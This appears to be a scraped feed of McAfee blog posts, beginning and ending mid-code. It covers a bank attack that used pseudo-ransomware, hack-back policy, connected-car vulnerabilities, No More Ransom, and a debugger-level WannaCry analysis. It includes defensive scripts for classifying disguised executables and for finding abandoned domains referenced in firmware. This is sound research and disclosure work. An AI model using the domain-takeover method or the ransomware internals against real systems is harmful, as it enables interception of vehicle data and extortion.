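    dos = bytearray(b"MZ" + b"\x00" * 0x3A)     # 0x3C bytes of DOS header
    dos += struct.pack("<I", 0x40)              # e_lfanew: PE signature at 0x40
    coff = b"PE\x00\x00" + struct.pack("<H", 0x014C) + b"\x00" * 18  # Machine = i386
    body = bytes(dos) + coff + b"\x00" * 8 + MARKERS[0] + b"\x00"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("aa.txt", body)
    return buf.getvalue()


def identify(data):
    """Classify a blob by magic bytes, ignoring whatever its name claims."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def pe_machine(data):
    """IMAGE_FILE_HEADER.Machine if data is a PE with a valid e_lfanew, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return struct.unpack_from("<H", data, e_lfanew + 4)[0]


def extract_and_classify(resource):
    """Unpack a zip resource and describe each member: claimed extension,
    actual type by magic, PE machine field, and which marker strings appear."""
    results = {}
    if identify(resource) != "zip":
        return results
    with zipfile.ZipFile(io.BytesIO(resource)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            kind = identify(data)
            results[name] = {
                "claimed": ext,
                "actual": kind,
                "mismatch": kind == "pe" and ext not in ("exe", "dll", "sys"),
                "machine": pe_machine(data),
                "markers": [m.decode() for m in MARKERS if m in data],
            }
    return results


if __name__ == "__main__":
    for name, info in extract_and_classify(build_fake_resource()).items():
        print(name, info)
```

Checking the PE signature through e_lfanew rather than stopping at “MZ” matters because many non-executable formats and junk blobs start with those two bytes; the Machine field then tells you which architecture to load in the disassembler.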

When analyzing the strings of this particular file, we discovered some interesting ones:

  • HERMES 2.1 TEST BUILD, press ok
  • HERMES

When executed, the file proved to be ransomware. However, no note or wallpaper indicated that this was ransomware. After the file finished running, only one thing appeared on the desktop:

Figure 3: The final screen of this pseudo ransomware.

And in every directory a file:

The original Hermes ransomware note points toward this file, but in our case we saw no note and no ransom demand. The Hermes ransomware family surfaced in February.

We suspect that this is another example of pseudo ransomware. Was the ransomware used to distract from the real purpose of this attack? We strongly believe so.

Based on our sources, the ransomware attack started in the network when the unauthorized payments were being sent.

Where next?

Clearly this was a very carefully crafted attack, and specifically targeted at one bank. The attackers identified specific individuals to email, and understood the security measures being deployed. Although the samples we identified are now covered by our security products, we urge caution in anyone assuming that “I am protected.” The criminals took their time to understand how the bank works and developed the necessary code to enable them to steal millions. An effective security posture must anticipate such highly skilled attackers.

Because this is related to an active law enforcement investigation, we are limiting what information we publicly share and will publish further updates only if that does not conflict with a current investigation.

The Hack Back: A Double-Edged Sword https://securingtomorrow.mcafee.com/business/hack-back-double-edged-sword/ https://securingtomorrow.mcafee.com/business/hack-back-double-edged-sword/#respond Fri, 29 Sep 2017 21:00:38 +0000 https://securingtomorrow.mcafee.com/?p=79473 Global cyberattacks like Mirai, WannaCry and Petya have left victims feeling helpless and eager to gain back the data they’ve lost at the hands of cybercriminals. This modern threat landscape has everyone looking towards new solutions and strategies—any way they can help protect others while staying secure themselves. So, it’s no surprise that the idea […]

The post The Hack Back: A Double-Edged Sword appeared first on McAfee Blogs.

Global cyberattacks like Mirai, WannaCry and Petya have left victims feeling helpless and eager to gain back the data they’ve lost at the hands of cybercriminals. This modern threat landscape has everyone looking towards new solutions and strategies, any way they can help protect others while staying secure themselves. So, it’s no surprise that the idea of the “hack back” is gaining some traction. The hack back is a notion that came to light in various congressional proposals intended to put tools in the hands of victims to identify alleged attackers, halt an alleged attack, and potentially recover or delete stolen information.

This legislation, first proposed back in May, features policies intended to empower victims of a cyberattack while still trying to ensure accountability. It sets a mandatory reporting requirement for entities that use active-defense techniques, which is intended to help federal law enforcement ensure defenders use these tools responsibly. It also includes an exemption allowing the recovery or destruction of one’s own data if it is located using the active-defense techniques permitted by the bill and does not result in the destruction of data belonging to another person.

While the objective of the legislation, helping companies improve their ability to defend themselves, is laudable, we have to consider its risks. Hacking back could damage parties that were innocently part of an attack, or that had no direct involvement at all and were implicated through false flag operations. For instance, we have recently seen that many attackers intend to point the source of their attacks at another party, as was witnessed during the Operation Troy attacks. Hacking back in that scenario would have caused damage to a third party.

Our approach, and one we would recommend to others, is to take direct action against malicious actors by utilizing the expertise of law enforcement. A strong partnership between the public and private sector to hold cybercriminals accountable is essential in maintaining a safer society. So, if you do undergo a cyberattack, your first action should be contacting the authorities immediately. From there, experts will handle the situation in a way that ensures safety for all innocent parties involved.

There is a lesson to be learned from the notion of hacking back, however. Instead of hacking back, learn how to think like a hacker in order to identify cyberattacks and flag them before the damage is done. By thinking proactively, the need for reactive measures lessens and the power shifts back to where it belongs: with you.

For more information on fighting back against hackers, read McAfee Labs’ latest Quarterly Threats Report and be sure to follow us at @McAfee and @McAfee_Labs.

DEFCON – Connected Car Security https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/defcon-connected-car-security/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/defcon-connected-car-security/#respond Wed, 02 Aug 2017 21:54:05 +0000 https://securingtomorrow.mcafee.com/?p=76677 Sometime in the distant past, that thing in your driveway was a car.  However, the “connected car is already the third-fastest growing technological device after phones and tablets.”  The days when a Haynes manual, a tool kit, and a free afternoon/week to work on the car are fast becoming a distant memory. Our connected cars […]

The post DEFCON – Connected Car Security appeared first on McAfee Blogs.

Sometime in the distant past, that thing in your driveway was a car. However, the “connected car is already the third-fastest growing technological device after phones and tablets.” The days when a Haynes manual, a tool kit, and a free afternoon (or week) were all you needed to work on the car are fast becoming a distant memory.

Our connected cars today generate up to 4,000GB of data per day, and their on-board cameras alone generate 20MB to 40MB per second. Not only do these devices generate significant data, but there are many connectivity options in the cars we use each day. With more connected features being introduced to cars, and our dependency on connected cars only increasing, a key focus of our Advanced Threat Research team has been to consider the possible attack vectors in automotive.

2016: the year of ransomware

It seems that every year is the year of ransomware! In 2016, however, the reality of ransomware on IoT was demonstrated after the team identified a vulnerability within a popular In-Vehicle Infotainment (IVI) system: we were able to insert ransomware over the air. In our demonstration the payload was not malicious, of course. Well, perhaps it was, since a very popular 80s song would be played at full volume until the victim paid up!

This demonstrated that the nightmare scenario so often talked about, in which you are unable to start your car without paying criminals, is indeed quite possible, though thankfully it has not been witnessed in the wild to date.

DEFCON 2017

So at DEFCON this year our ATR team, in particular Oleksandr Bazhaniuk, Jesse Michael, and Mickey Shkatov, continued their focus on automotive. The start of the research was not particularly auspicious, however: a trip to the wrecker’s yard in search of hardware ended with a car full of loot!

The dashboard was reconstructed in our US Lab.

After fixing some errors, the unit was ready. Since we had already worked on an IVI, the on-board IVI looked interesting, but after some research we determined it would take considerable work to get into that area. By studying the system’s diagnostic information instead, we were able to retrieve useful data from the navigation system, including SRAM and Flash dumps. In one of the dumps, the team discovered a possibly interesting URL referring to a domain owned by a car manufacturer. After checking the WHOIS records for the domain, we discovered that nobody owned it any longer. The team quickly registered the domain and set up a generic honeypot to capture any incoming connections of any sort that were sent to the domain.

To our surprise, we had several connection attempts registered with information about the geographic location of the cars, and if the car was currently set to navigate to a particular waypoint, we received the GPS coordinates of that waypoint as well as the name of the waypoint.

After responsibly disclosing this issue in February 2017 to the car manufacturer, a fix for the owners has since been released.
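The first step in the story above, spotting a URL in a memory dump and asking whether anyone still owns the domain, is easy to automate. The script below is an added example written for this post, not the ATR team’s code: it pulls URLs out of a constructed stand-in for an SRAM/Flash dump (binary noise with a few embedded ASCII and UTF-16LE strings; the example-oem.invalid hostnames are placeholders, not the manufacturer’s domain), reduces them to registrable domains, and reports the ones not in a caller-supplied set of domains confirmed to still be registered. The WHOIS lookup itself needs network access and is left to the reader.

```python
import re

# Constructed stand-in for a navigation-unit SRAM/Flash dump: binary noise
# with a few embedded ASCII and UTF-16LE strings. Not a real dump; the
# .invalid hostnames are placeholders, not the manufacturer's domain.
SAMPLE_DUMP = (
    b"\x00\xff\x10\x20" * 8
    + b"http://telematics.example-oem.invalid/nav/update.cgi?v=2\x00"
    + b"\x7f\x00\x13"
    + "https://maps.example-oem.invalid/poi\x00".encode("utf-16le")
    + b"\x01\x02junk"
    + b"ftp://user:pw@files.example-oem.invalid/fw.bin\x00"
    + b"\x00" * 16
)

# RFC 3986 characters, enough for strings pulled out of firmware.
URL_RE = re.compile(rb"(?:https?|ftp)://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
# Runs of printable UTF-16LE (printable byte, NUL) at least six characters long.
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
HOST_RE = re.compile(r"^[a-z]+://(?:[^@/]*@)?([^/:?#]+)")


def extract_urls(dump):
    """URLs embedded as ASCII or UTF-16LE anywhere in a binary dump."""
    urls = [m.group(0).decode("ascii") for m in URL_RE.finditer(dump)]
    for w in WIDE_RE.finditer(dump):
        narrow = w.group(0).decode("utf-16le").encode("ascii")
        urls.extend(m.group(0).decode("ascii") for m in URL_RE.finditer(narrow))
    return urls


def hostnames(urls):
    """Distinct hostnames referenced by the URLs, with any userinfo stripped."""
    hosts = set()
    for url in urls:
        m = HOST_RE.match(url.lower())
        if m:
            hosts.add(m.group(1))
    return sorted(hosts)


def registrable_domain(host):
    """Last two labels. A public-suffix list handles co.uk-style names properly;
    kept naive here on purpose."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def takeover_candidates(dump, registered):
    """Domains the firmware talks to that are not in the caller's set of
    domains confirmed (e.g. via WHOIS) to still be registered."""
    domains = {registrable_domain(h) for h in hostnames(extract_urls(dump))}
    return sorted(domains - set(registered))


if __name__ == "__main__":
    for url in extract_urls(SAMPLE_DUMP):
        print("url :", url)
    print("check registration of:", takeover_candidates(SAMPLE_DUMP, []))
```

Scanning for UTF-16LE as well as ASCII matters on embedded Windows CE and Android units, where configuration strings are frequently wide; an ASCII-only strings pass would have missed the second URL in the sample.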

Telematics

We presented these findings during the DEFCON conference this year, along with other findings about a Telematics Control Unit (TCU) used in multiple cars across at least four car manufacturers, as far as we can confirm. What is a telematics unit? It is the component the vehicle uses to connect to the outside world, be it the internet or a manufacturer-specific intranet site.

These units are the conduit through which the car connects to the back end. This particular telematics unit used 2G cellular connectivity. After investigating the circuit board for interesting components, the team studied the USB interaction by placing a USB sniffer as a man-in-the-middle to learn what data was being exchanged between the IVI and the modem, and what might be shared over outgoing connections.

After more research and testing, the team found locally exploitable classic buffer overflow vulnerabilities. More and more were discovered, including a known over-the-air telematics vulnerability discovered by Dr. Ralf-Philipp Weinmann (CVE-2010-3832), also a buffer overflow. After we used one of the local vulnerabilities to write an exploit and extract the baseband firmware of the telematics unit, we started reverse engineering the code to see whether we could send arbitrary Controller Area Network (CAN bus) messages from the TCU.

We again followed our responsible disclosure process and informed the involved parties, including US-CERT. After studying our submission, US-CERT released an advisory on Thursday, the first day of DEFCON, allowing us time to study it and to reference it, and any mitigations it mentioned, during our talk on Saturday.

Update

Since the initial notification to Nissan and BMW we have been advised that a free fix via a Technical Service Bulletin has been issued to their dealers, which is available now to all affected customers in U.S. and Canada.

Through the process of coordinating this disclosure via ICS-CERT, we additionally discovered that a small number of other vehicles were also affected by these issues.  We will update this blog as more data becomes available.

Stay up to date on this story and follow @McAfee and @McAfee_Business.

NoMoreRansom – One year on! https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/nomoreransom-one-year/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/nomoreransom-one-year/#respond Tue, 25 Jul 2017 14:20:05 +0000 https://securingtomorrow.mcafee.com/?p=76357 One year on. It is fair to say that the No More Ransom project not only exceeded our expectations, but simply blew these initial expectations out of the water. A collaboration between six partners (McAfee, EC3, Dutch Police, Kaspersky Lab, AWS and Barracuda) has now grown to include more than 100 partners across the public and private sector. We often hear people talk about Public-Private Partnerships, but here is a true example of that commitment in action.

The post NoMoreRansom – One year on! appeared first on McAfee Blogs.

One year on.  It is fair to say that the No More Ransom project not only exceeded our expectations, but simply blew these initial expectations out of the water.  A collaboration between six partners (McAfee, EC3, Dutch Police, Kaspersky Lab, AWS and Barracuda) has now grown to include more than 100 partners across the public and private sector.  We often hear people talk about Public-Private Partnerships, but here is a true example of that commitment in action.

Because of this commitment from all the partners, this initiative has resulted in the successful decryption of more than 28,000 computers.  Let us put that into context: for zero cost, victims of ransomware who are not customers of any security provider can get their data back for nothing.  They do not have to fill in a survey, enter their email address or provide their credit card details; in fact, they do not even have to worry about obfuscating their IP address.  For the first time, there is another option.  No longer are victims faced with the choice of a) losing their data or b) paying criminals.

So thank you to all of our partners, and thank you to those of you who tweeted and blogged about it.  This site has been successful, in fact so successful that we even have ransomware named after us.

Of course, the Queen of England gets a boat named after her; we get ransomware!  Well, that is okay, because it shows that, as tens of millions of dollars have been kept out of the hands of criminals, they have taken notice.

We will not stop, in fact, we need more partners, more decryption tools, and more successes.   The message of #DontPay seems to be working (as we witnessed with WannaCry and nPetya), and we will continue in our efforts to hurt the bottom line of criminals.

 

Show me the money – Financial Services Need to Rethink Security https://securingtomorrow.mcafee.com/business/show-money-financial-services-need-rethink-security/ https://securingtomorrow.mcafee.com/business/show-money-financial-services-need-rethink-security/#respond Thu, 22 Jun 2017 04:05:58 +0000 https://securingtomorrow.mcafee.com/?p=75206 Financial institutions are under attack. As gatekeepers to consumers’ and enterprises’ most personal and private information, this industry serves as one of the most lucrative avenues for cybercriminals to pursue. In response, financial services organizations have developed unsustainable security infrastructures that are characterized by a huge proliferation of tools to address “the next big thing” […]

The post Show me the money – Financial Services Need to Rethink Security appeared first on McAfee Blogs.

Financial institutions are under attack. As gatekeepers to consumers’ and enterprises’ most personal and private information, this industry serves as one of the most lucrative avenues for cybercriminals to pursue. In response, financial services organizations have developed unsustainable security infrastructures that are characterized by a huge proliferation of tools to address “the next big thing” in cyber threats.

As highly publicized breaches continue against financial institutions, organizations are stuck in a frustratingly reactive cycle: with every emerging attack a new tool or widget is added to an already complex arsenal of security solutions. This stockpile of tools often lacks automation and Big Data analytics capabilities, preventing IT teams from cataloging and responding to threats in a timely manner. Over time, organizations are left struggling to patch holes and close siloed security gaps, always looking to identify the next vulnerability, which makes it difficult to get ahead.

The industry must move beyond this segregated approach to better protect itself and its customers. According to Closing the Cybersecurity Gaps in Financial Services, a global survey from Ovum sponsored by McAfee, an overwhelming number of financial institutions, especially Tier 1 and 2, deploy between 100-200 disparate security solutions.  The report also finds that three percent of global financial services institutions use over 100 security solutions, reducing effectiveness, adding operational cost and increasing their organization’s cyber risk exposure. Adding to security teams’ burdens, 37 percent of respondents deal with over 200,000 daily security alerts. Security teams are overwhelmed sifting through and prioritizing the vast number of alerts that each security tool generates, often with limited threat intelligence sharing between the various tools. The sheer manpower required to accurately sift through each alert drains resources and leaves security teams drowning in IT complexity. Not surprisingly, over a third of respondents across EMEA, US and APAC listed integrating and maintaining disparate security tools as their top operational pain point.

Financial institutions operate in a highly complex and interconnected financial ecosystem connecting thousands of entities, networks and users across the globe. Petabytes of data, billions of messages and transactions flow across this interconnected system on a daily basis and make it a daunting task to monitor, detect and block anomalous activities, elusive threats and under-the-radar attacks in real-time. These worries are corroborated by the Ovum study, where 40 percent of respondents indicated that faster threat discovery is their first or second security priority. To enable quicker threat detection, over 70 percent of organizations are planning strategic investments in cloud, web and ATM security.

Ovum highlights some promising trends that point towards a better, more secure future for these organizations. Financial institutions have undergone a significant shift in the decision-making process for cybersecurity initiatives, with teams outside IT such as fraud, compliance, risk management and operations all now taking part. Forty-eight percent of respondents from the fraud team reported they were a decision maker in their company’s cybersecurity initiatives, followed by compliance and risk management, both reporting over 37 percent. This shift highlights the high priority that financial institutions have placed on cybersecurity, which is well-warranted considering that breaches have severe consequences that reach as far as fraud, insider/outsider collusion, regulatory compliance and legal exposure. In this regard, these organizations are regarded as the gold standard that all other industries should aspire to.

The financial services industry is in the beginning stages of another industry-wide shift, as over 60 percent of respondents agree that the industry needs better, not more, security tools, which will ultimately enable greater automation, integration and orchestration of tasks, as well as end-to-end visibility across the security infrastructure. The next big financial breach continues to be one of the biggest concerns in the financial services industry, constantly serving as a reminder to organizations for the need of a unified and fully implemented security strategy. Greater automation, integration and orchestration are necessary first steps to provide relief to these teams, which can only be delivered through a unified threat defense architecture. The transformation to an open source communications fabric offers a significant impact on the efficiency and effectiveness for organizations by simplifying the integration of disparate tools and enabling the sharing of threat data.

Join McAfee and a host of financial experts for Transforming Cybersecurity in Financial Services, a free webinar on Thursday, June 22, 2017, at 10 a.m. EST to learn more on current gaps and challenges in financial IT security, emerging threat vectors and attacks, use of machine learning and advanced analytics, best practices that can benefit financial institutions and the path forward.

 

Is WannaCry Really Ransomware? https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/wannacry-really-ransomware/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/wannacry-really-ransomware/#respond Thu, 08 Jun 2017 16:26:14 +0000 https://securingtomorrow.mcafee.com/?p=74857 Ransomware follows a relatively simple model: data is encrypted, the victim pays, data is decrypted. At least that is what those who create ransomware want you to believe. This was also our assumption when we began our analysis of WannaCry—that those behind the campaign would decrypt victims’ data once they received payment. However, for a campaign with incredibly effective propagation techniques, reasonable key and data management, and a working anonymous communication fabric with Bitcoin payments, we found a major flaw: The WannaCry attackers appear to be unable to determine which users have paid the ransom and they cannot decrypt on a per-user basis.

The post Is WannaCry Really Ransomware? appeared first on McAfee Blogs.

This post summarizes the significant efforts of a McAfee threat research team that has been relentless in its efforts to gain a deeper understanding of the WannaCry ransomware. We would like to specifically acknowledge Christiaan Beek, Lynda Grindstaff, Steve Grobman, Charles McFarland, and Kunal Mehta for their efforts.

Ransomware follows a relatively simple model: data is encrypted, the victim pays, data is decrypted. At least that is what those who create ransomware want you to believe. This was also our assumption when we began our analysis of WannaCry—that those behind the campaign would decrypt victims’ data once they received payment. However, for a campaign with incredibly effective propagation techniques, reasonable key and data management, and a working anonymous communication fabric with Bitcoin payments, we found a major flaw: The WannaCry attackers appear to be unable to determine which users have paid the ransom and they cannot decrypt on a per-user basis.

Technical summary

Our analysis into the encryption and decryption functions within WannaCry reveals an effective tool set. The authors:

  • Created an 8-byte unique identifier (via CryptGenRandom) that identifies the current machine and all the encrypted files on that machine. This ID is used in all communications with the back end and is intended to allow per-user decryption. (See “Can the attackers be contacted?” for details.)
  • Practiced reasonable data sanitization techniques to prevent the recovery of key material. (See “Does WannaCry prevent recovery of key material?”)
  • Followed reasonable practices to prevent the recovery of plain-text file data. (See “Does WannaCry prevent recovery of file data?”)
  • Developed a (somewhat unreliable) back end that keeps track of which users have encrypted files. (See “Can the authors respond? Can they return a private key?”)
  • Made file decryption possible, provided that the “Check Payment” interaction with the back end results in the decrypted key being written to 00000000.dky. The authors know if the returned data is a key or a message to be displayed to the user. The authors must have tested this at least once, and have thus tested full decryption where the need for the correct private key was clearly known. (See “Recovering the user’s private key”)
  • WannaCry appears to have been written by (at least) two authors or teams with different motives:
    • One author favored Win32 APIs and wrapping those APIs or using object orientation.
    • The other author favored C, common APIs (such as fopen), and long procedural functions. They may have been responsible for weaponizing the file encryptor/decryptor, but we do not know. If we are correct, this code probably introduced the unique ID idea but the interface was not updated to include a way to associate the ID with the user’s Bitcoin wallet.

The WannaCry authors demonstrated good technical governance, for example, the key handling, buffer sanitization, and private key security on disk using a strongly encrypted format. It is odd that with such good governance, the same group neglected to include something as essential as a unique ID for a user (or instance of attack) because this is mandatory to decrypt a specific user’s files. While much of the initial analysis described the WannaCry campaign as “shoddy,” the use of good technical governance suggests that there are elements of this campaign that are well implemented.

This competence raises doubts that the campaign was shoddy. Given the level of capability demonstrated, we would expect the developers would have found and fixed basic errors. Indeed, could the inclusion of these basic errors be an attempt to make the campaign appear amateur? Without apprehending those behind the campaign, it is impossible to know their motivation; yet a thorough analysis of the technical artefacts questions the shoddy theory.


Motivations

What were the attackers’ motives? Is this real ransomware or something else? For a particular ransomware family to make money in the long term, it must be able to encrypt and decrypt files, and have a reputation that once payment is sent, data can be recovered.

We have identified three potential motives:

  • To make money
    • WannaCry has the key components required for a financially successful campaign—including propagation, key management, data sanitization techniques to prevent data and key recovery, anonymous payment, and messaging and decryption infrastructure.
    • To keep ransom payments flowing, the authors used current messaging infrastructure to ask users to send their Bitcoin wallet IDs to the attackers. This is the same messaging infrastructure that ultimately delivers the user’s private key, allowing full decryption.
    • However, there is limited evidence from the field that payment yields data decryption.
  • To test key components of the ransomware
    • This is likely because the malware contains almost no reverse engineering and debugging protection.
    • We have already seen new WannaCry variants that are harder to analyze because components download 24 hours or so after infection time.
  • To disrupt
    • Ransomware as a destructive mechanism. The use of ransomware to destroy or generate noise, though not common, would be a particularly effective tactic.

Determining the authors' intent is not trivial, and likely not possible with the information available. However, to get closer to an answer, the question we need to answer is whether WannaCry is fully functional. Analyzing that leads to a few detailed questions that we explored:

  • Can WannaCry decrypt files?
  • Can the authors be contacted?
  • Can the authors respond? Can they return a private key?
  • Does WannaCry prevent the recovery of files?
  • Does WannaCry prevent the recovery of key material?

Is WannaCry fully functional?

WannaCry can communicate with a back end that maintains its state and prevents the recovery of key material and file data. If one has the user’s private key, the user’s data can be recovered. Despite its bugs and design issues, WannaCry is effective. It is not high quality or well implemented, but it is effective.

Can WannaCry decrypt files?

The short answer is Yes. WannaCry’s encryption, key management, and file formats have been documented by McAfee Labs, so we will not cover that here. Instead, we will focus on the decryption tool, which we know makes use of the following API sets:

  • Microsoft’s crypto APIs.
    • CryptGenKey, CryptGenRandom, CryptExportKey, CryptImportKey, CryptEncrypt, CryptDecrypt, etc.
  • Microsoft’s file management APIs.
    • CreateFileW, ReadFile, WriteFile, CloseHandle, etc.
  • C runtime library file APIs
    • fopen, fread, fwrite, fflush, fclose, etc.

Using WinDbg or IDA Pro, we can set conditional breakpoints on the APIs used by @WanaDecryptor@.exe and dump out useful information. Given the lack of debugging protection in the ransomware, this is one of the fastest ways to understand WannaCry’s behavior.

Sample decryption

To encourage users to pay the ransom, the decryption tool @WanaDecryptor@.exe can decrypt a small number of files for free. After the “free” files have been decrypted, the decryptor looks for the file 00000000.dky, which should contain the user’s private key. If found, this key is used to decrypt all files on the system. If we have the user’s private key, can we decrypt all files?

Recovering the user’s private key

To prove that decryption is possible, we need the private key:

  • Break on CryptGenKey and get the handle to any created key pair.
  • Break on CryptExportKey and watch the export of the public and private keys to memory.
    • Here we can steal the private key and check if decryption works.
  • [Optionally] put break points showing the encryption of the private key with the attacker’s public key (hardcoded within the encryptor binary), and save it to disk in 00000000.eky.

To analyze the key creation, we can use the following breakpoints:

Figure 1: Crypto API breakpoints for key import and export.

As WannaCry initializes, it calls CryptGenKey to generate a new random key, the handle to which is returned in the fourth parameter.


Figure 2: Creating a new random key.

Next, WannaCry exports the public key from the generated key and saves it to the file 00000000.eky. Note the presence of 0x06 and RSA1. This indicates that the exported key blob is a public key. To view the key blob, save the address of the buffer and buffer size in temporary registers, allow the function to return, and dump the key blob using the address and size values from the temporary registers.

Figure 3: Capturing the user’s public key.

Next, WannaCry exports the private-public key pair to memory. Note the presence of 0x07 and RSA2 in the exported buffer.

Figure 4: Capturing the user’s private-public key pair.

Immediately afterward, WannaCry encrypts the user’s private key with the attacker’s public key and writes the file to 00000000.eky. The contents of this file are sent to the attackers when the user clicks “Check Payment” (as discussed further in “Can the attackers be contacted?”).

At this moment, the private-public key pair is easily recoverable, so we can issue a command to dump that memory to a file, as shown below:

Figure 5: Writing the private key to disk from WinDbg.

In Figure 5, we have given the private key almost the correct name. If the file 00000000.dky exists and contains a valid private key that can decrypt files, WannaCry will abort its encryption run. To decrypt files, rename the file to 00000000.dky once all files have been encrypted, and click on Decrypt.

Figure 6: Dialog after WannaCry successfully decrypts all files.

Based on this analysis, WannaCry is capable of per-user decryption, provided that WannaCry can send the user’s private key to the back end, receive the private decrypted key, and place it in the correct location.


Can the attackers be contacted?

WannaCry provides two methods of communication with the attackers: the “Contact Us” link and the “Check Payment” button on the main decryptor interface, shown below in Figure 7.

Figure 7: WannaCry’s Decryptor interface.

If WannaCry allowed recovery, both interface controls should function. Assuming that all communication is over standard network sockets, we can inspect the traffic in real time using WinDbg/IDA Pro with the breakpoints in Figure 8.

Figure 8: Breakpoints for analyzing network traffic.

Our goal is to determine what is being sent to and received from the back end. The detail is not shown here, but WannaCry makes use of TOR to anonymize communications with the attackers, cycling through many TOR servers. We looked for the user’s private key being sent to the back end, where we expected it to be decrypted and sent back if the user had paid the ransom (or if the attackers had decided to randomly decrypt a user’s key). We found one message that was large enough. An example is shown in Figure 9.

Figure 9: A large and interesting buffer sent to the back end.

However, the data did not match any part of the user’s private key stored on disk; could this communication be encrypted? Looking at the call stack, we saw several frames:

Figure 10: Post encryption send call stack.

Looking at the previous frame, we saw a simple wrapper around ws2_32!send, so this is not an encryptor.

Figure 11: ws2_32!send wrapper.

Looking at the frame before the send wrapper in Figure 11, we found a reasonably long function beginning at 0x0040d300 that appears to be responsible for obfuscating the buffer, and we confirmed that using IDA Pro with a second breakpoint, as shown below:

Figure 12: Message obfuscator function breakpoint.

Rerunning our Check Payment debugging run, our new breakpoint fired and revealed the message to be sent prior to obfuscation:


Figure 13: Message to be sent to back end.

The message encodes information that identifies the user. We color-coded the message components in Figures 13 and 15:

  • Green: The 8-byte unique ID stored in the first 8 bytes of 00000000.res. This is created by a call to CryptGenRandom during WannaCry’s initialization and persists for the life of the attack.
  • Orange: The computer name retrieved with GetComputerNameA.
  • Red: The user’s name retrieved by GetUserNameA.
  • Bold: The Bitcoin wallet ID that the user should have sent money to, and the amount that the user should have paid.
  • Cyan: The encrypted user’s private key as read from 00000000.eky.

Based on the message content, it is reasonable to assert that the attacker’s back end receives all the information required to identify users who have paid the ransom, and should be able to perform per-user decryption, provided there is a mechanism for users to tie their Bitcoin transfers to the 8-byte unique ID that represents their specific encryption instance. However, we found no mechanism to do this and there are no interface elements or instructions to help.

Running the same experiment using the Contact Us interface shown in Figure 14, we sent a message “Hey! Can I have my files back?” to the attackers, and using our breakpoint from Figure 12, we determined that a common messaging framework is used.

Figure 14: Messaging interface.


Figure 15: Message sent to back end.

The results in Figure 15 show:

  • Both Check Payment and Contact Us appear to use a common messaging format
    • 8-byte unique ID, machine name, username is always sent.
    • The payload can vary according to message type.

As a result, we conclude that the attackers should have been able to uniquely identify a user but they clearly omitted a mechanism to tie a payment to an ID, making per-user decryption technically impossible.

Can the authors respond? Can they return a private key?

Shortly after its release, Check Payment began returning a message to users instructing them to use the Contact Us mechanism to send the users’ Bitcoin wallet addresses, as shown in Figure 16.

Figure 16: Request for a Bitcoin wallet address.

This message confirms that the attackers can respond. It also gives us an opportunity to analyze the flow of Check Payment messages. Using the same send and recv breakpoints from Figure 8, we received the following obfuscated message:

Figure 17: Encrypted response received from attackers.

Using the following breakpoint, we then watched for that data being written to the obfuscated buffer; if the obfuscation removal occurs in place, we should be able to look at the decrypted buffer.

Figure 18: Message decryption breakpoint.

Once the breakpoint fires, we saw that the message was modified in place:

Figure 19: In-place decryption of the encrypted message.

Our analysis of the function in question in WinDbg and IDA Pro indicated that on return the message was in plain text. Issuing the gu command to step out of the function, we saw the message decrypted, as shown in Figure 20.

Figure 20: Decrypted check-payment message.

This is the same message that we saw displayed in the dialog box, so end-to-end communication is working. But, how is this message used? Again, we made use of a hardware breakpoint, as shown in Figure 21.

Figure 21: Hardware breakpoint to track the decrypted message.

The preceding breakpoint triggers during a call to fwrite to 00000000.dky; the message is written to a file that should contain the user’s private key, as shown below in a subsequent call to WriteFile as part of fwrite, fflush.

Figure 22: Entire message being written to 00000000.dky

The entire message, or whatever was sent back to the decryptor, is written to the file 00000000.dky. Thus we conclude that Check Payment should return a crypto API key blob for the user’s private key. By enabling our key import breakpoint shown in Figure 1, we verified this, as shown below:

Figure 23: The decrypted message imported as a key in CryptImportKey.

Note the value of eax at the bottom of Figure 23 after CryptImportKey has returned: eax is 0, which means that CryptImportKey failed. If CryptImportKey fails, then WannaCry eventually deletes 00000000.dky and displays the message to the user. If CryptImportKey succeeds, the user can successfully decrypt all the files.

From this analysis, we conclude:

  • The WannaCry communication fabric is active and can return messages.
  • The WannaCry back end is live and tracking users because the help message is returned only once.
  • The WannaCry client expects that a message or private key can be returned from the back end:
    • If the message is not a private key (CryptImportKey fails), the client assumes the message is text that should be shown to the user.
    • Private keys are left on disk in 00000000.dky and allow the user to decrypt their files.
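The decision described above (a key blob that CryptImportKey accepts versus a text message that is shown to the victim) turns on the Microsoft CryptoAPI blob layout noted in Figures 3 and 4: a BLOBHEADER with bType 0x06 followed by the "RSA1" magic for a PUBLICKEYBLOB, or bType 0x07 followed by "RSA2" for a PRIVATEKEYBLOB. The following is an added example for examining a recovered 00000000.dky offline; it is not McAfee's code, and the blobs it builds carry dummy key material rather than anything captured from a sample.

```python
"""Classify what a WannaCry 00000000.dky file contains: an RSA key blob or a message.

Added example (not McAfee's or WannaCry's code). It applies the same acceptance
rule that CryptImportKey enforces on RSA blobs: a valid BLOBHEADER + RSAPUBKEY
header whose declared key size matches the amount of key material present.
"""
import struct

PUBLICKEYBLOB = 0x06
PRIVATEKEYBLOB = 0x07
CUR_BLOB_VERSION = 0x02
CALG_RSA_KEYX = 0x0000A400

# BLOBHEADER: bType, bVersion, reserved, aiKeyAlg (little-endian)
BLOBHEADER = struct.Struct("<BBHI")
# RSAPUBKEY: magic ("RSA1" public / "RSA2" private), bitlen, pubexp
RSAPUBKEY = struct.Struct("<4sII")
HEADER_LEN = BLOBHEADER.size + RSAPUBKEY.size  # 20 bytes


def key_body_len(btype: int, bitlen: int) -> int:
    """Length of the key material that follows the two headers."""
    n = bitlen // 8
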